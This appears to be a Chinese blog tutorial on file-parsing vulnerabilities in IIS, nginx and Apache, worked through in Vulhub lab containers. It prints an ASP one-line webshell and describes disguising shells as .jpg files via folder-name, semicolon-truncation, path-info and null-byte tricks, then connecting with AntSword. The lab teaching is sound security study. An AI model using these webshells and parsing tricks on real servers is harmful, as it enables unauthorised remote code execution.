文件解析漏洞中间件(iis和Apache)

IIS解析漏洞

IIS6.X

复制代码
#环境
Windows Server 2003

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

复制代码
<%=now()%>
#asp一句话
<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个文件路径/xx.jpg

后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

php.ini里的cgi.fix_pathinfo=1 开启

IIS7在Fast-CGI运行模式下

复制代码
#环境
PHPstudy for IIS

配置 php.ini 文件,将 cgi.fix_pathinfo=1 注释取消掉;并重启

IIS -->配置网站-->处理程序映射-->PHPStudy_FastCGI -->请求限制 -->取消勾

然后在网站下创建我们的shell;并命名为1.jpg

去网站访问他

加上/.php就可以被解析为php文件

蚁剑连接一下

nginx解析漏洞

靶场安装

复制代码
docker

查看docker容器是否安装,若未安装,执行下面的命令

复制代码
yum install docker

yum install docker-compose

docker -v

docker-compose -v

yum install git

git clone https://github.com/vulhub/vulhub.git

ls
复制代码
cd vulhub/

1.Vulhub靶场nginx_parsing

我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境

复制代码
cd nginx/

ls

选择这一关进入

复制代码
cd nginx_parsing_vulnerability/

docker-compose up -d
复制代码
docker ps

这样就可以看到这一关的端口号为:80,浏览器访问

写一个图片马

2.Vulhub靶场CVE-2013-4547

我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境

复制代码
cd nginx/

ls

选择这一关进入

复制代码
cd CVE-2013-4547/

docker-compose up -d
复制代码
docker ps

这样就可以看到这一关的端口号为:8080,浏览器访问

修改为00,然后放行

Apache解析漏洞

1.Vulhub靶场apache_parsing_vulnerability

我们可以发现里面有很多靶场,找到我们需要的靶场环境

复制代码
cd vulhub/

cd  httpd/ 

ls

选择这一关进入

复制代码
cd apache_parsing_vulnerability/

docker-compose up -d
复制代码
docker ps

这样就可以看到这一关的端口号为:8080,浏览器访问

警告不用搭理

用蚁剑连接

2.Vulhub靶场CVE-2017-15715

相关推荐
SunnyRivers2 天前
LangChain中间件详解
中间件·langchain
一名优秀的码农2 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp2 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp2 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人3 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
金刚猿3 天前
06_虚拟机中间件部署_xxl-job 部署
中间件·xxl-job·xxl-job-admin
努力的lpp3 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0073 天前
渗透测试_漏洞利用
网络安全
啥都想学点3 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ3 天前
基于网络隐身的内网穿透
网络协议·网络安全·go